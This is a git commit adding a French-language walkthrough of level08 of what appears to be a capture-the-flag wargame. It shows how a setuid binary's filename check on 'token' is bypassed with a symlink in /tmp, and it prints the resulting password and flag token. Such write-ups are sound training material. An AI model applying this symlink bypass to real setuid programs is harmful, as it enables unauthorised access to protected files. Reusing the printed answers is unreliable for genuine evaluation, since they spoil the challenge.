docs(lvl08): adding the readme
This commit is contained in:
Raphael
parent
3bedec9e94
commit
81b0f0ae23
1 changed files with 51 additions and 0 deletions
51
level08/README.md
Normal file
51
level08/README.md
Normal file
|
|
@ -0,0 +1,51 @@
|
|||
Lors de mon arriver sur le level08 je remarque tout de suite que j'ai deux fichier sur mon home
|
||||
|
||||
```bash
|
||||
ls -l
|
||||
total 16
|
||||
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08
|
||||
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
|
||||
```
|
||||
|
||||
Un executable qui malgres mes tentative ne me donne rien de vraiement precis uniquement mais qui semble lire un fichier
|
||||
|
||||
```bash
|
||||
./level08
|
||||
./level08 [file to read]
|
||||
```
|
||||
|
||||
Et je tente alors de lire token mais il me met un message d'erreur
|
||||
|
||||
```bash
|
||||
./level08 token
|
||||
You may not access 'token'
|
||||
```
|
||||
|
||||
Mais la facon dont est fait le program protege uniquement un fichier qui contien token
|
||||
```bash
|
||||
ltrace ./level08 token
|
||||
__libc_start_main(0x8048554, 2, 0xbffff7f4, 0x80486b0, 0x8048720 <unfinished ...>
|
||||
strstr("token", "token") = "token"
|
||||
printf("You may not access '%s'\n", "token"You may not access 'token'
|
||||
) = 27
|
||||
exit(1 <unfinished ...>
|
||||
+++ exited (status 1) +++
|
||||
```
|
||||
|
||||
Je decide donc de faire un lien symbolique sur le fichier de token ailleurs (la ou je peux ecrire)
|
||||
```bash
|
||||
ln -s /home/user/level08/token /tmp/test
|
||||
```
|
||||
|
||||
Et j'obtiens quelque chose qui ressemble a un flag
|
||||
```bash
|
||||
./level08 /tmp/test
|
||||
quif5eloekouj29ke0vouxean
|
||||
```
|
||||
|
||||
qui n'est pas un flag mais le mot de passe pour flag08 auquel je me connect et fait la commande getflag
|
||||
|
||||
```bash
|
||||
getflag
|
||||
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
|
||||
```
|
||||
Loading…
Add table
Add a link
Reference in a new issue